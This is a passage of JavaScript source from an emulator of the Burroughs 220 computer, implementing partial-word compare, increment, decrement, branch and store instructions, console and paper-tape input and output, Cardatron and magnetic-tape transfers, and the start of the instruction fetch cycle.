Dx=%2s D=%11s", 99, (ax+0x1000).toString(16).substring(1), (am+0x100000000000).toString(16).substring(1), (rm+0x100000000000).toString(16).substring(1), (dx+0x1000).toString(16).substring(1), (dm+0x100000000000).toString(16).substring(1)); ***************************/ // Reconstruct the final product in the registers this.A.set((sign*0x100 + ax)*0x100000000 + am); this.R.set(rSign*0x10000000000 + rm); } timing += 4.075 + 0.060*count; } } // Set the registers and toggles for display this.AX.set(ax); this.DX.set(dx); this.D.set(dm); } this.SGT.set(sign); this.DST.set(dSign); this.opTime = timing; }; /*********************************************************************** * Partial-Word Operations * ***********************************************************************/ /**************************************/ B220Processor.prototype.compareField = function compareField() { /* Implements CFA/CFR (18). Compares the value in either the A or R register to a word in memory, either whole word or a designated partial field, by subtracting the respective memory digits from the register digits. Sets the comparison indicators (UET, HIT) to indicate whether the register field is LOW (UET=1, HIT=0), EQUAL (UET=0, HIT=1), or HIGH (UET=1, HIT=1) with respect to the memory field. Note that the sign digit, if included in the comparison is handled in a very strange fashion -- see the discussion in the 220 Operational Characteristics manual for the truly gruesome details. And no, I didn't get this right the first time, nor the second, nor the third */ var adder = 0; // current adder digit var carry = 1; // carry flag defaults to 1, since we're subtracting var compl = 1; // do complement addition by default, since we're subtracting var dd; // current memory (D-register) digit var dSign = 0; // memory (D-register) sign var dw; // memory (D-register) word var high = 1; // initialize compare toggles to EQUAL var L; // partial-word length var rSign; // register sign digit var rd; // current register digit var rw; // register word value var s; // partial-word "s" digit var sign = 1; // default sign is negative, since we're subtracting var unequal = 0; // initialize compare toggles to EQUAL this.opTime = 0.150; this.E.set(this.CADDR); this.UET.set(0); this.HIT.set(0); this.readMemory(); if (!this.MET.value) { this.SUT.set(1); dw = this.IB.value; this.D.set(dw); if (this.CCONTROL%0x10 == 1) { rw = this.R.value; // CFR: Compare Field R } else { rw = this.A.value; // CFA: Compare Field A } // Determine field lengths for partial- or whole-word comparison. if (!(this.CCONTROL & 0x10)) { // whole word s = 10; L = 11; } else { // partial word s = this.CCONTROL >>> 12; if (s == 0) { s = 10; } L = (this.CCONTROL >>> 8)%0x10; if (L == 0) { L = 10; } } // If the sign digit is included in the comparison, set up for algebraic // comparison and the strange sign ordering. This is tricky. Basically, // the non-signed digits need to be compared in a signed, algebraic manner, // but the transformed sign digits need to be compared unsigned. Since the // compare is based on a signed subtraction, then if the original sign of // either of the operands indicates negative (1, 2, 3), we use the 9s- // complement of the transformed sign digit for that operand, converting // the unsigned compare of the transformed sign digits into a signed one. if (L > s) { // sign digit is included rSign = (rw - rw%0x10000000000)/0x10000000000; if (rSign < 8) { rSign ^= 3; } dSign = (dw - dw%0x10000000000)/0x10000000000; if (dSign < 8) { dSign ^= 3; } if (dSign > 2) { sign = 1; } else { // treat as negative sign = 0; dSign = 9-dSign; } if (rSign > 2) { compl = sign; } else { // treat as negative compl = 1-sign; rSign = 9-rSign; } carry = compl; rw = rw%0x10000000000 + rSign*0x10000000000; dw = dw%0x10000000000 + dSign*0x10000000000; } // Now go through a modified add cycle, subtracting the digit pairs using // 10s-complement addition, and marking the result unequal if any digits differ. this.DC.set(0x09); // set up to rotate through 11 digits do { rd = rw%0x10; dd = dw%0x10; if (s < 10) { // positition to the "s" digit ++s; } else if (L > 0) { // compare digits in the sL field --L; this.X.set(rd); // for display only this.Y.set(dd); adder = (compl ? 9-rd : rd) + dd + carry; if (adder < 10) { // decimal correct the adder carry = 0; } else { carry = 1; adder -= 10; } this.Z.set(adder); // for display only if (adder) { // if the adder is not zero, unequal = 1; // result will be unequal, determined by sign } } else { // Ignore any digits after L is exhausted this.DC.set(0x19); // (the 220 didn't quit early like this, though) } // Shift both words right (no need to rotate them) rw = (rw-rd)/0x10; dw = (dw-dd)/0x10; this.DC.inc(); } while (this.DC.value < 0x20) // If there is a final carry, we keep the original sign; if we are not complementing, // force an unequal result. If there is no final carry, we complement the result sign. if (carry) { if (!compl) { unequal = 1; } } else { sign = 1-sign; } // Set the console lamps and toggles to the result. if (unequal) { // result is unequal, sign determines low/high high = 1-sign; // negative=low, positive=high this.compareEqualLamp.set(0); this.compareLowLamp.set(1-high); this.compareHighLamp.set(high); } else { this.compareEqualLamp.set(1); this.compareLowLamp.set(0); this.compareHighLamp.set(0); } this.DST.set(dSign%2); this.SGT.set(sign); this.HIT.set(high); this.UET.set(unequal); this.CCONTROL = ((s%10)*0x10 + L)*0x100 + this.CCONTROL%0x100; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); if (L > 0) { this.setProgramCheck(1); } } }; /**************************************/ B220Processor.prototype.increaseFieldLocation = function increaseFieldLocation() { /* Implements IFL (26). Increments a designated partial field in a memory word by the two-digit value in (42) of the C register */ var adder = 0; // current adder digit var carry = 0; // carry flag defaults to 0, since we're adding var dd; // current memory (D-register) digit var dw; // memory (D-register) word var L; // partial-word length var rd; // current increase digit var rw; // increase value var s; // partial-word "s" digit this.opTime = 0.160; this.SUT.set(0); this.DST.set(0); this.SGT.set(0); this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { dw = this.IB.value; this.D.set(dw); rw = this.CCONTROL%0x100; // increase value s = this.CCONTROL >>> 12; if (s == 0) { s = 10; } L = (this.CCONTROL >>> 8)%0x10; if (L == 0) { L = 10; } // Now go through a modified add cycle for each digit. this.DC.set(0x09); // set up to rotate 11 digits while (this.DC.value < 0x20) { dd = dw%0x10; // get digit from memory value if (s < 10) { // positition to the "s" digit ++s; adder = dd; // just copy the digit } else if (L > 0) { // operate on the partial-word field --L; rd = rw%0x10; // get digit from increase value this.X.set(rd); // for display only this.Y.set(dd); adder = rd + dd + carry; if (adder < 10) { // decimal correct the adder carry = 0; } else { carry = 1; adder -= 10; } this.Z.set(adder); // for display only rw = (rw-rd)/0x10; // shift the increase value right } else { adder = dd; // copy any remaining digits after L is exhausted } dw = (dw-dd)/0x10 + adder*0x10000000000; // rotate result into memory value this.DC.inc(); } // while DC < 20 this.D.set(dw); this.IB.set(dw); this.C10.set(carry); // set carry toggle if (carry) { this.OFT.set(1); // set overflow if there's a carry } this.CCONTROL = ((s%10)*0x10 + L)*0x100 + this.CCONTROL%0x100; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); if (L > 0) { // check whether L was decremented to zero this.setProgramCheck(1); } else { this.writeMemory(); } } }; /**************************************/ B220Processor.prototype.decreaseFieldLocation = function decreaseFieldLocation(loadB) { /* Implements DFL/DLB (27, 28). Decrements a designated partial field in a memory word by the two-digit value in (42) of the C register */ var adder = 0; // current adder digit var carry = 1; // carry flag defaults to 1, since we're subtracting var dd; // current memory (D-register) digit var dw; // memory (D-register) word var L; // partial-word length var rd; // current decrease digit var rw; // decrease value var s; // partial-word "s" digit this.opTime = 0.160; this.SUT.set(1); this.DST.set(1); this.SGT.set(0); this.RPT.set(0); if (loadB) { this.B.set(0); } this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { dw = this.IB.value; this.D.set(dw); rw = this.CCONTROL%0x100; // decrease value s = this.CCONTROL >>> 12; if (s == 0) { s = 10; } L = (this.CCONTROL >>> 8)%0x10; if (L == 0) { L = 10; } // Now go through a modified add cycle for each digit. this.DC.set(0x09); // set up to rotate 11 digits while (this.DC.value < 0x20) { dd = dw%0x10; // get digit from memory value if (s < 10) { // positition to the "s" digit ++s; adder = dd; // just copy the digit } else if (L > 0) { // operate on the partial-word field --L; rd = rw%0x10; // get digit from decrease value this.X.set(rd); // for display only this.Y.set(dd); adder = 9 - rd + dd + carry; if (adder < 10) { // decimal correct the adder carry = 0; } else { carry = 1; adder -= 10; } this.Z.set(adder); // for display only rw = (rw-rd)/0x10; // shift the decrease value right if (loadB) { // shift adder digit into B if op=DLB this.B.value = (this.B.value - this.B.value%0x10)/0x10 + adder*0x1000; } } else { adder = dd; // copy any remaining digits after L is exhausted } dw = (dw-dd)/0x10 + adder*0x10000000000; // rotate result into memory value this.DC.inc(); } // while DC < 20 this.D.set(dw); this.IB.set(dw); this.C10.set(carry); // set carry toggle if (carry) { this.RPT.set(1); // set repeat toggle if no underflow } if (loadB) { // set B register if op=DLB this.B.set(this.B.value); } this.CCONTROL = ((s%10)*0x10 + L)*0x100 + this.CCONTROL%0x100; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); if (L > 0) { // check whether L was decremented to zero this.setProgramCheck(1); } else { this.writeMemory(); } } }; /**************************************/ B220Processor.prototype.branchField = function branchField(regValue) { /* Implements BFA/BFR (36, 37). Compares digits of a designated partial field in the A or R register word to a rotating two-digit value in (42) of the C register */ var adder = 0; // current adder digit var carry = 1; // carry flag defaults to 1, since we're subtracting var dd; // current pattern digit var dw; // rotating 2-digit pattern value var equal = 1; // start out assuming equality var L; // partial-word length var rd; // current register digit var rw = regValue; // register value var s; // partial-word "s" digit this.opTime = 0.075; this.SUT.set(1); dw = this.CCONTROL%0x100; // 2-digit pattern to compare s = this.CCONTROL >>> 12; if (s == 0) { s = 10; } L = (this.CCONTROL >>> 8)%0x10; if (L == 0) { L = 10; } // Now position the word and compare digits to the rotating pattern. this.DC.set(0x09); // set up to rotate 11 digits while (this.DC.value < 0x20) { rd = rw%0x10; // get digit from register value if (s < 10) { // positition to the "s" digit ++s; // just ignore any initial digits } else if (L > 0) { // operate on the partial-word field --L; dd = dw%0x10; // get digit from increase value this.X.set(rd); // for display only this.Y.set(dd); adder = 9 - rd + dd + carry; if (adder < 10) { // decimal correct the adder carry = 0; } else { carry = 1; adder -= 10; } this.Z.set(adder); // for display only dw = (dw-dd)/0x10 + dd*0x10;// rotate the 2-digit pattern if (adder) { equal = 0; // if the adder is not zero, fields are unequal } } else { // just ignore any remaining digits after L is exhausted } rw = (rw-rd)/0x10; // shift register word right (no need to rotate it) this.DC.inc(); } // while DC < 20 this.C10.set(carry); // set carry toggle, for display only if (equal) { // if equality exists, branch this.opTime += 0.020; this.P.set(this.CADDR); } this.CCONTROL = ((s%10)*0x10 + L)*0x100 + this.CCONTROL%0x100; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); if (L > 0) { // check whether L was decremented to zero this.setProgramCheck(1); } }; /**************************************/ B220Processor.prototype.storeRegister = function storeRegister() { /* Implements STA/STR/STB (40). Stores a whole word or a designated partial field in a memory word based on the sL (22) digits of the C register */ var adder; // current adder digit var dd; // current memory (D-register) digit var dw; // memory (D-register) word var L; // partial-word length var rd; // current increase digit var rw; // increase value var s; // partial-word "s" digit var xd; // current D-register digit var xw = 0; // word used to construct the D-register value this.opTime = 0.100; this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { switch (this.CCONTROL%0x10) { case 1: // STR: Store R rw = this.R.value; break; case 2: // STB: Store B rw = this.B.value; break; default: // STA: Store A rw = this.A.value; break; } // switch if ((this.CCONTROL & 0x10) == 0) { // whole-word store this.D.set(rw); this.IB.set(rw); s = L = 0; } else { // partial-word store this.D.set(0); dw = this.IB.value; s = this.CCONTROL >>> 12; if (s == 0) { s = 10; } L = (this.CCONTROL >>> 8)%0x10; if (L == 0) { L = 10; } // Now position the field and copy the digits this.DC.set(0x09); // set up to rotate 11 digits while (this.DC.value < 0x20) { rd = rw%0x10; // get digit from register value dd = dw%0x10; // get digit from memory value if (s < 10) { // positition to the "s" digit ++s; adder = dd; // just copy the memory digit xd = 0; } else if (L > 0) { // operate on the partial-word field --L; adder = rd; // copy digit from register into memory value xd = rd; } else { adder = dd; // just copy any remaining memory digits after L is exhausted xd = 0; } dw = (dw-dd)/0x10 + adder*0x10000000000; // rotate result digit into memory value rw = (rw-rd)/0x10; // shift register value right (no need to rotate it) xw = xw/0x10 + xd*0x10000000000; // copy zero or register digit into D-register this.DC.inc(); } // while DC < 20 this.D.set(xw); this.IB.set(dw); } this.CCONTROL = ((s%10)*0x10 + L)*0x100 + this.CCONTROL%0x100; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); if (L > 0) { // check whether L was decremented to zero this.setProgramCheck(1); } else { this.writeMemory(); } } }; /*********************************************************************** * Console I/O Module * ***********************************************************************/ /**************************************/ B220Processor.prototype.keyboardAction = function keyboardAction(d) { /* Receives a single digit from the Console keyboard. Non-negative values of d indicate decimal digit keys and are shifted into the low-order digit of D. Negative values of d indicate function keys: -1 = ADD key pressed -2 = C key pressed -3 = E key pressed -4 = EXAM key pressed -5 = ENT key pressed -6 = STEP key pressed */ var word = this.D.value; if (!this.RUT.value) { // make sure we're not running switch (d) { case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: case 8: case 9: this.D.set((this.D.value%0x10000000000)*0x10 + d); break; case -1: // ADD key pressed this.keyboardAdd(); break; case -2: // C key pressed, do D -> C this.fetchWordToC(word); break; case -3: // E key pressed, do D -> E this.E.set(word%0x10000); this.D.set(0); break; case -4: // EXAM key pressed, memory -> D this.readMemory(); if (!this.MET.value) { // invalid address this.E.inc(); this.D.set(this.IB.value); } break; case -5: // ENT key pressed, D -> memory this.IB.set(word); this.writeMemory(); if (!this.MET.value) { this.E.inc(); } break; case -6: // STEP key pressed this.step(); break; } // switch d } }; /**************************************/ B220Processor.prototype.keyboardAdd = function keyboardAdd() { /* Algebraically add the addend (D) to the augend (A), returning the result in A. Similar to integerAdd(), except (a) the processor must not be running, (b) there is no reference to memory, (c) the addend comes from D instead of IB, (d) subtract is not possible, although the numbers may be signed, and (e) the processor is returned to running status after the add completes. No timing is accumulated because the processor has been stopped */ var am = this.A.value % 0x10000000000; // augend mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var compl; // complement addition required var dm = this.D.value % 0x10000000000; // addend mantissa var dSign = ((this.D.value - dm)/0x10000000000)%2; var sign = dSign; // local copy of sign toggle if (!this.RUT.value) { // we must be stopped this.SUT.set(0); compl = (aSign^sign); am = this.bcdAdd(am, dm, 11, compl, compl); // Now examine the resulting sign (still in the adder) to see if we // have overflow or need to recomplement the result. switch (this.Z.value) { case 0: am += sign*0x10000000000; break; case 1: am += (sign-1)*0x10000000000; this.OFT.set(1); break; default: // sign is 9 // reverse the sign toggle and recomplement the result (virtually adding to the zeroed dm) sign = 1-sign; am = this.bcdAdd(am, 0, 11, 1, 1); // after recomplementing, set the correct sign (adder still contains sign of result) am += (sign - this.Z.value)*0x10000000000; break; } // switch this.Z.value if (am%0x10000000000 == 0) { am = aSign*0x10000000000; } // Set toggles for display purposes and return the result this.DST.set(dSign); this.SGT.set(sign); this.A.set(am); this.start(); } }; /**************************************/ B220Processor.prototype.consoleOutputSign = function consoleOutputSign(printSign) { /* Outputs the sign character for a SPO (09) command and sets up to output the first number digit */ var d; var w; this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared d = this.bcdAdd(this.CCONTROL, 0x990, 3); // decrement word count this.CCONTROL += d - this.CCONTROL%0x1000; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address this.ioComplete(true); } else { this.D.set(this.IB.value); this.execClock += 0.070; // estimate for memory access and rotation w = this.D.value%0x10000000000; d = (this.D.value - w)/0x10000000000; // get the sign digit this.D.set(w*0x10 + d); // rotate D+sign left one this.DC.set(0x10); // set up for 10 more digits this.DPT.set(this.CCONTROL%0x10 == 1 && this.COP == 0x09); this.LT1.set(this.LEADINGZEROESSW); // use LT1 for leading-zero suppression (probably not accurate) this.EWT.set(0); this.PZT.set(d == 2 && !this.HOLDPZTZEROSW); this.PA.set(0x80 + d); // translate numerically this.asyncOn(); printSign(this.PA.value, this.boundConsoleOutputChar); } } }; /**************************************/ B220Processor.prototype.consoleOutputChar = function consoleOutputChar(printChar) { /* Outputs the next character code for a SPO (09) command and sets up to output the next number digit. If the Shift Counter is already at 20, terminates the output operation and sends a Finish signal */ var d; var w; this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared if (this.EWT.value) { if (this.CCONTROL%0x1000 < 0x10) { this.asyncOn(); printChar(0x35, this.boundConsoleOutputFinished); } else { this.C.inc(); this.CADDR = this.C.value%0x10000; this.asyncOn(); printChar(0x35, this.boundConsoleOutputSign); } } else if (this.PZT.value) { // Output alphabetically w = this.D.value % 0x1000000000; d = (this.D.value - w)/0x1000000000; // get next 2 digits this.D.set(w*0x100 + d); // rotate D+sign left by two this.execClock += 0.060; // estimate for rotation this.DC.inc(); // increment DC for two digits this.DC.inc(); this.PA.set(d); if (this.DC.value >= 0x20) { this.EWT.set(1); } this.asyncOn(); printChar(d, this.boundConsoleOutputChar); } else { // Output numerically if (this.DPT.value && !this.LEADINGZEROESSW) { // decimal point may be needed d = this.CCONTROL >>> 12; if (this.DC.value + d > 0x19) { this.DPT.set(0); this.LT1.set(0); // stop any zero-suppression this.PA.set(0x03); // decimal point code this.asyncOn(); printChar(0x03, this.boundConsoleOutputChar); return; // early exit } } do { // suppress leading zeroes if necessary w = this.D.value % 0x10000000000; d = (this.D.value - w)/0x10000000000; // get a digit this.D.value = w*0x10 + d; // rotate D+sign left by one this.execClock += 0.065; // estimate for rotation this.DC.inc(); } while (d == 0 && this.LT1.value && this.DC.value < 0x20); this.LT1.set(0); this.D.set(this.D.value); d += 0x80; // translate numerically this.PA.set(d); if (this.DC.value >= 0x20) { this.EWT.set(1); } this.asyncOn(); printChar(d, this.boundConsoleOutputChar); } } }; /**************************************/ B220Processor.prototype.consoleOutputFinished = function consoleOutputFinished() { /* Handles the final cycle of console output */ this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared this.EWT.set(0); this.ioComplete(true); } }; /**************************************/ B220Processor.prototype.consoleInputFinishWord = function consoleInputFinishWord(result) { /* Finishes the receipt of a word from the Console paper tape reader and either stores it in memory or shunts it to the C register for execution. Updates the C register as necessary and decides whether to initiate receipt of another word. Note that this routine does not do asyncOff -- that is handled by the caller */ var d; var w; if (this.sDigit) { // decrement word count d = this.bcdAdd(this.CCONTROL, 0x990, 3); this.CCONTROL += d - this.CCONTROL%0x1000; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); } if (this.COP != 0x05) { // read normal: sign digit in normal position w = this.D.value%0x10000000000; d = (this.D.value - w)/0x10000000000; } else { // read inverse: permute the sign digit d = this.D.value%0x10; w = (this.D.value - d)/0x10; this.D.set(w + d*0x10000000000); if (d == 2) { // alphanumeric translation is invalid for inverse mode this.setPaperTapeCheck(1); this.ioComplete(true); return; // >>> ALARM ERROR EXIT <<< } } if (this.rDigit & d & 0x08) { // B-modify word before storing this.D.set(w + (d&0x07)*0x10000000000); this.IB.set(this.D.value - w%0x10000 + this.bcdAdd(w, this.B.value, 4)); this.C10.set(0); } else { // store word as-is this.IB.set(this.D.value); } if (this.rDigit == 1 && (d & 0x0E) == 0x06) { // control word to C register this.ioComplete(false); // terminate I/O but do not restart Processor yet this.fetch(true); // set up to execute control word // Schedule the Processor to give the reader a chance to finish its operation. setCallback(this.mnemonic, this, 0, this.schedule); } else { // just store the word this.writeMemory(); if (this.MET.value) { // memory address error this.ioComplete(true); } else if (this.sDigit && this.CCONTROL%0x1000 < 0x10) { // word count exhausted this.ioComplete(true); } else { // initiate input of another word this.D.set(0); this.asyncOn(); if (this.COP == 0x05) { d = this.console.inputUnitSelect(this.selectedUnit, this.boundConsoleInputInitiateInverse); } else { d = this.console.inputUnitSelect(this.selectedUnit, this.boundConsoleInputInitiateNormal); } if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } } } }; /**************************************/ B220Processor.prototype.consoleInputInitiateNormal = function consoleInputInitiateNormal(result) { /* Initiates the receipt into a word of characters from the Console tape reader in normal (sign-first) mode. Increments the C register operand address, rotates the sign digit into the D register, and determines whether the word should be translated numerically or alphanumerically */ var code = result.code; this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared this.E.set(this.CADDR); this.C.inc(); this.CADDR = this.C.value%0x10000; switch (code) { case 0x17: // invalid character/parity error this.setPaperTapeCheck(1); this.ioComplete(true); break; case 0x35: // end-of-word this.consoleInputFinishWord(result); break; case 0x82: // sign=2, set alpha translation this.PZT.set(!this.HOLDPZTZEROSW); this.D.set(2); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); break; default: // anything else, set numeric translation this.PZT.set(0); if ((code & 0xF0) == 0x80) {// it's a numeric sign -- okay this.D.set(code%0x10); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else if (code == 0) { // we'll take a space as a zero this.D.set(0); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else { // sign is non-numeric -- invalid this.D.set(0); this.setPaperTapeCheck(1); this.ioComplete(true); } break; } // switch code } }; /**************************************/ B220Processor.prototype.consoleInputInitiateInverse = function consoleInputInitiateInverse(result) { /* Initiates the receipt into a word of characters from the Console tape reader in inverse (sign-last) mode. Increments the C register operand address, rotates the sign digit into the D register, and sets PZT for numeric translation */ var code = result.code; this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared this.E.set(this.CADDR); this.C.inc(); this.CADDR = this.C.value%0x10000; switch (code) { case 0x17: // invalid character/parity error this.setPaperTapeCheck(1); this.ioComplete(true); break; case 0x35: // end-of-word this.consoleInputFinishWord(result); break; default: // anything else, set numeric translation this.PZT.set(0); if ((code & 0xF0) == 0x80) {// it's a numeric code -- okay this.D.set(code%0x10); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else if (code == 0) { // we'll take a space as a zero this.D.set(0); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else { // digit is non-numeric -- invalid this.D.set(0); this.setPaperTapeCheck(1); this.ioComplete(true); } break; } // switch code } }; /**************************************/ B220Processor.prototype.consoleInputReceiveChar = function consoleInputReceiveChar(result) { /* Handles an input character coming from the Console paper-tape reader. result.code is the B220 character code read from the device. result.readChar is the callback function to request the next character. Data digits are rotated into the D register; end-of-word (0x35) codes are handled according to the sign digit in the D register */ var code = result.code; // character received var sign; // register sign digit var word; // register word less sign this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared switch (code) { case 0x17: // invalid character/parity error this.setPaperTapeCheck(1); this.ioComplete(true); break; case 0x35: // end-of-word this.consoleInputFinishWord(result); break; default: // anything else, accumulate digits in word if (this.PZT.value) { // alphanumeric translation this.D.set((this.D.value % 0x1000000000)*0x100 + code); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else { // numeric translation if ((code & 0xF0) == 0x80) {// it's a numeric code -- okay this.D.set((this.D.value % 0x10000000000)*0x10 + code%0x10); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else if (code == 0) { // we'll take a space as a zero this.D.set((this.D.value % 0x10000000000)*0x10); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else { // code is non-numeric -- invalid this.setPaperTapeCheck(1); this.ioComplete(true); } } break; } // switch code } }; /*********************************************************************** * Cardatron I/O Module * ***********************************************************************/ /**************************************/ B220Processor.prototype.cardatronOutputWord = function cardatronOutputWord() { /* Initiates a read of the next word from memory for output to the Cardatron Control Unit. Returns a negative number to stop transfer */ var word; this.asyncOff(); if (!this.AST.value) { // we've probably been cleared word = -1; } else if (this.MET.value) { // previous memory access error word = 0; } else { word = this.readMemory(); // address in E was previously set if (this.MET.value) { word = 0; } else { this.E.dec(); // step down to next memory address } this.execClock += 0.117; // time for full-word transfer } this.asyncOn(); return word; }; /**************************************/ B220Processor.prototype.cardatronOutputFinished = function cardatronOutputFinished() { /* Handles the final cycle of an I/O operation and restores this.execTime */ if (this.AST.value) { // if false, we've probably been cleared this.ioComplete(true); } }; /**************************************/ B220Processor.prototype.cardatronReceiveWord = function cardatronReceiveWord(word) { /* Handles a word coming from the Cardatron input unit. Negative values for the word indicates this is the last word and the I/O is finished. Otherwise, the word is stored into the D register and is handled according to the sign digit in the D register. The last word received (typically a "pusher" word of zeroes) is abandoned and not acted upon. Returns -1 if further data transfer is to be terminated, 0 otherwise */ var returnCode = 0; // default is to continue receiving var sign; // D-register sign digit this.asyncOff(); if (!this.AST.value) { // we've probably been cleared returnCode = -1; } else if (word < 0) { // Last word received -- finished with the I/O this.D.set(word-0x900000000000);// remove the finished signal; for display only, not stored this.ioComplete(true); returnCode = -1; } else if (this.MET.value) { // Memory error has occurred: just ignore further data from Cardatron this.asyncOn(); } else { // Full word accumulated -- process it and initialize for the next word this.D.set(word); word %= 0x10000000000; // strip the sign digit sign = (this.D.value - word)/0x10000000000; // get D-sign switch (sign) { case 0: // sign is 0-5: store word normally case 1: case 2: case 3: case 4: case 5: this.IB.set(this.D.value); this.writeMemory(); if (!this.MET.value) { this.E.dec(); // decrement memory address for next word } this.asyncOn(); break; case 6: // sign is 6, 7: execute control word case 7: if (this.vDigit & 0x01) { // input control words are inhibited this.IB.set(this.D.value); this.writeMemory(); // just store the word with its sign if (!this.MET.value) { this.E.dec(); // decrement memory address for next word } this.asyncOn(); } else { // input control words are executed this.IB.set(this.D.value); // move word to IB for use by fetch() this.ioComplete(false); // terminate I/O but do not restart Processor yet this.fetch(true); // set up to execute control word returnCode = -1; // stop further input from Cardatron // Schedule the Processor to give Cardatron a chance to finish its operation. setCallback(this.mnemonic, this, 0, this.schedule); } break; default: // sign is 8, 9: store word with optional B mod if (!(this.rDigit & 0x08)) { // no B-register modification this.IB.set(this.D.value); } else { // add B to low-order four digits of word word = word - word%0x10000 + this.bcdAdd(word, this.B.value, 4); this.C10.set(0); // reset carry toggle this.IB.set((sign%2)*0x10000000000 + word); } this.writeMemory(); if (!this.MET.value) { this.E.dec(); // decrement memory address for next word } this.asyncOn(); break; } // switch sign this.execClock += 0.117; // time for full-word transfer } return returnCode; }; /*********************************************************************** * Magnetic Tape I/O Module * ***********************************************************************/ /**************************************/ B220Processor.prototype.magTapeComplete = function magTapeComplete(control, word) { /* Call-back routine to signal completion of a magnetic tape operation. If this.AST is false, does nothing, as we have probably either been cleared or the Reset/Transfer switch has been activated. Otherwise, if "control" is true, the contents of "word" are processed as a tape control word and an appropriate branch is set up. Unconditionally terminates the tape I/O instruction. asyncOff() will be done by ioComplete() */ var aaaa = 0; // address where C & P will be stored var bbbb = 0; // address to load into P if (this.AST.value) { // if false, we've probably been cleared if (control) { this.D.set(word); bbbb = word%0x10000; aaaa = ((word - bbbb)/0x10000)%0x10000; if (word%0x20000000000 >= 0x10000000000) { // if sign bit is 1, bbbb = this.bcdAdd(bbbb, this.B.value, 4); // B-adjust the low-order 4 digits } this.E.set(aaaa); this.readMemory(); if (!this.MET.value) { this.IB.set(this.IB.value - this.IB.value%0x100000000 + (this.C.value%0x10000)*0x10000 + this.P.value%0x10000); this.writeMemory(); this.P.set(bbbb); } } Promise.resolve(true).then(this.boundIoComplete); } }; /**************************************/ B220Processor.prototype.magTapeSendWord = function magTapeSendWord(initialFetch) { /* Sends the next of data from memory to the tape control unit, starting at the current operand address in the C register. "initialFetch" is true if this call is the first to fetch words for a block. This causes the routine to save the current operand address in the control digits of C. Returns binary -1 if the processor has been cleared or a memory address error occurs, and the I/O must be aborted. Returns the BCD memory word otherwise */ var result; // return value this.asyncOff(); if (!this.AST.value) { result = -1; // we've probably been cleared } else { if (initialFetch) { this.CCONTROL = this.CADDR; // copy C address into control digits } this.E.set(this.CADDR); this.CADDR = this.bcdAdd(this.CADDR, 1, 4); this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address result = -1; } else { result = this.IB.value; this.D.set(result); } } this.asyncOn(); return result; }; /**************************************/ B220Processor.prototype.magTapeReceiveWord = function magTapeReceiveWord(initialStore, word) { /* Stores the next of data from the tape control unit to memory, starting at the current operand address in the C register. "initialStore" is true if this call is the first to store words for a block. This causes the routine to save the current operand address in the control digits of C. Returns binary -1 if the processor has been cleared or a memory address error occurs, and the I/O must be aborted. Returns 0 otherwise */ var result = 0; // return value var sign; // sign digit this.asyncOff(); if (!this.AST.value) { result = -1; // we've probably been cleared } else { if (initialStore) { this.CCONTROL = this.CADDR; // copy C address into control digits } this.E.set(this.CADDR); this.CADDR = this.bcdAdd(this.CADDR, 1, 4); this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); this.D.set(word); if (this.vDigit & 0x08) { // B-adjustment of words is enabled sign = (word - word%0x10000000000)/0x10000000000; if (sign & 0x08) { // this word is to be B-adjusted word = (sign&0x07)*0x10000000000 + word%0x10000000000 - word%0x10000 + this.bcdAdd(word, this.B.value, 4); this.C10.set(0); // reset carry toggle } } this.IB.set(word); this.writeMemory(); if (this.MET.value) { // invalid address result = -1; } } this.asyncOn(); return result; }; /*********************************************************************** * Fetch Module * ***********************************************************************/ /**************************************/ B220Processor.prototype.fetchWordToC = function fetchWordToC(word) { /* Transfers "word" to the C register, applying B-register modification if necessary */ var dSign = ((word - word%0x10000000000)/0x10000000000)%2; this.DST.set(dSign); this.CADDR = word%0x10000; // C address this.COP = (word%0x1000000 - this.CADDR)/0x10000; // C op code this.CCONTROL = (word%0x10000000000 - word%0x1000000)/0x1000000;// C control digits if (!dSign) { this.C.set(word%0x10000000000); } else { this.CADDR = this.bcdAdd(this.CADDR, this.B.value, 4); this.C10.set(0); // reset carry toggle this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); } }; /**************************************/ B220Processor.prototype.fetch = function fetch(entryP) { /* Implements the Fetch cycle of the 220 processor. This is initiated either by pressing START on the Console with EXT=0 (Fetch), pressing STEP on the Console when the computer is stopped and EXT=0, during I/O when a control word (sign 6,7) is received from a peripheral device, or by the prior Operation Complete if the processor is in continuous mode. The "entryP" parameter indicates whether the instruction word is already in IB (true) or must be fetched from the address in P first (false) */ var dSign; // sign bit of IB register var word; // instruction word if (entryP) { // if instruction already loaded word = this.IB.value; } else { // if doing normal fetch this.E.set(this.P.value); word = this.readMemory(); } if (!this.MET.value) { // 